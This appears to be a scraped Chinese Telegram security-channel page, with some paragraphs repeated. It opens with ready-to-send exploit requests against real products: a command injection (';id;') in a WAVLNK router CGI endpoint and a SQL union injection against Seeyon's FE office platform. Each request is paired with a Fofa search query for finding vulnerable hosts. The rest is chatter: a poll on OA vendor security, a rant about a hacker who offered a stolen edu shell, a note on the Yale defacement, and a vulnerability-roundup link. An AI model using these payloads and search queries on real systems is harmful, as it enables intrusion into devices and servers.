WAVLNK路由器rce漏洞
Fofa语法:body="firstFlage"
GET /cgi-bin/live_api.cgi?page=abc&id=173&ip=;id; HTTP/1.1Host: Cache-Control: max-age=0Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9
Fofa语法:body="firstFlage"
GET /cgi-bin/live_api.cgi?page=abc&id=173&ip=;id; HTTP/1.1Host: Cache-Control: max-age=0Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9
致远互联FE协作办公平台editflow_manager存在sql注入漏洞
noscript="FE协作办公平台" || body="li_plugins_download"
POST /sysform/003/editflow_manager.js%70 HTTP/1.1Host: x.x.x.xUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15Connection: closeContent-Length: 41Content-Type: application/x-www-form-urlencodedAccept-Encoding: gzipoption=2&GUID=-1'+union+select+111*222--+
noscript="FE协作办公平台" || body="li_plugins_download"
POST /sysform/003/editflow_manager.js%70 HTTP/1.1Host: x.x.x.xUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15Connection: closeContent-Length: 41Content-Type: application/x-www-form-urlencodedAccept-Encoding: gzipoption=2&GUID=-1'+union+select+111*222--+
❤1
年底了,我发OA系统,大伙觉得从安全方面来说今年被爆金币爆得最狠的是
Anonymous Poll
16%
万户
22%
蓝凌
18%
通达
43%
泛微
22%
致远
6%
广联达
4%
信呼
14%
金蝶云
5%
华天动力
7%
红帆
隔壁TG信安频道前两天发帖开团了一个给耶鲁大学挂黑页的某人,具体详见https://news.1rj.ru/str/xxtxxxlplg/1880 这个瓜我就不做评价了,有兴趣的自己吃
然后我当时凑热闹去加了流光的qq群,我qq头像和tg一样的,辨识度很高。瓜是吃完了我以为结束了,没想到因此又扯出一位重量级。不知道什么来路的qq带黑客某人在群里看到我了跑来加我好友,先是聊了几句“技术交流”。我这种懒狗没咋搭理随便应付了几句,本来以为就是和✈️上差不多的一般路过水友
然后突然开始问我能不能在我频道转发他的qq群群号和介绍他们黑客组织,就引流嘛,我没答应。到这里也都正常
然后给我说如果我在频道转发了他们组织和qq群就拿一个国内的edu的shell给我……好吧有点难绷,首先我拿这玩意没有半点用因为我就是个破蓝队,你白送我我也只会拿去补天换点库币。第二个国内的edu硬是被你当流通货币用啊😅 qq上这么整我只能说嫌晶哥上门不够快
说到这里的时候我就没理他了。然后带黑客就开始红温,什么装nm高冷你就是一个脚本小子娱乐圈,tg粉丝都是刷的他在tg上认识别的人可以推他们群巴拉巴拉然后日妈草娘的语气词也不少,就qq带黑客加喷蛆融合体那种素质和语气,懂的都懂。把👴🏻给整不会了。tg有tg的逆天法qq有qq的逆天法,黑客犯罪低龄化空前严重,强烈呼吁国家关注一下这块
另外他所谓那个edu不是真的edu,其实是一个网校的二级域名🤡
并且有人告诉我这位在镜哥那ctf群里发昨天m3日的那几个什么全国石油技术标准委员会新密卫健委的test页说是他自己日下来的,妈的笑死我了
然后我当时凑热闹去加了流光的qq群,我qq头像和tg一样的,辨识度很高。瓜是吃完了我以为结束了,没想到因此又扯出一位重量级。不知道什么来路的qq带黑客某人在群里看到我了跑来加我好友,先是聊了几句“技术交流”。我这种懒狗没咋搭理随便应付了几句,本来以为就是和✈️上差不多的一般路过水友
然后突然开始问我能不能在我频道转发他的qq群群号和介绍他们黑客组织,就引流嘛,我没答应。到这里也都正常
然后给我说如果我在频道转发了他们组织和qq群就拿一个国内的edu的shell给我……好吧有点难绷,首先我拿这玩意没有半点用因为我就是个破蓝队,你白送我我也只会拿去补天换点库币。第二个国内的edu硬是被你当流通货币用啊😅 qq上这么整我只能说嫌晶哥上门不够快
说到这里的时候我就没理他了。然后带黑客就开始红温,什么装nm高冷你就是一个脚本小子娱乐圈,tg粉丝都是刷的他在tg上认识别的人可以推他们群巴拉巴拉然后日妈草娘的语气词也不少,就qq带黑客加喷蛆融合体那种素质和语气,懂的都懂。把👴🏻给整不会了。tg有tg的逆天法qq有qq的逆天法,黑客犯罪低龄化空前严重,强烈呼吁国家关注一下这块
另外他所谓那个edu不是真的edu,其实是一个网校的二级域名🤡
并且有人告诉我这位在镜哥那ctf群里发昨天m3日的那几个什么全国石油技术标准委员会新密卫健委的test页说是他自己日下来的,妈的笑死我了
Telegram
TG信息安全共享频道
21世纪顶级黑客入侵耶鲁大学
快照地址https://web.archive.org/web/20231226123047/https://summerstaff.yale.edu/news
真是愚蠢又无知👩💻
Top hackers of the 21st century breach Yale University
Snapshot address https://web.archive.org/web/20231226123047/https://summerstaff.yale.edu/news…
快照地址https://web.archive.org/web/20231226123047/https://summerstaff.yale.edu/news
真是愚蠢又无知👩💻
Top hackers of the 21st century breach Yale University
Snapshot address https://web.archive.org/web/20231226123047/https://summerstaff.yale.edu/news…
❤2👍1
【盘点 2023 年造成实际破坏的十大漏洞-哔哩哔哩】 https://b23.tv/ZLVNZfe
Bilibili
盘点 2023 年造成实际破坏的十大漏洞_哔哩哔哩_bilibili
这是知道创宇404实验室在今年的安全漏洞应急中总结出的 10 个威胁程度高、影响范围广的漏洞,这些漏洞在网络空间中被黑客积极利用,造成了十分恶劣的影响,排名不分先后。通过对安全漏洞的整理,帮助我们从中吸取经验和教训,欢迎大家与我们交流。https://mp.weixin.qq.com/s/Hhkj3R80OjQ87qZESnrRnw, 视频播放量 1486、弹幕量 0、点赞数 28、投硬币枚数 5、收藏人数 22、转发人数 7, 视频作者 知道创宇404实验室, 作者简介 404实验室是网络安全公司知道创宇核心部门,长期致力于Web…
👍1
Forwarded from TG信息安全共享频道